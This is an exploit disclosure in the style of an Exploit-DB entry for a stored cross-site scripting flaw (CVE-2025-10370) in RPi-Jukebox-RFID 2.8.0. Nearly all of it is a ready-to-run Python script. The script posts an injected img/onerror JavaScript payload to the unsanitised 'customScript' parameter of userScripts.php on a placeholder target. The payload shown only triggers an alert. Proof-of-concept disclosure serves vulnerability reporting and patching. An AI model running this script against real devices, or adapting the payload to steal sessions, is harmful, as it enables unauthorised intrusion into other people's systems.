RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)

# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10370
#
# Description:
# This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
# The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
# of arbitrary JavaScript payloads.

import requests

# Change this to the actual IP or hostname of the target device
TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"

# The XSS payload
PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'

# HTTP headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": TARGET,
}

# POST data with the malicious payload
data = {
    "customScript": PAYLOAD
}

def send_exploit():
    print(f"[+] Sending XSS payload to {TARGET}")
    try:
        r = requests.post(TARGET, headers=headers, data=data, timeout=5)
        print(f"[+] Payload sent. Status code: {r.status_code}")
        print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    send_exploit()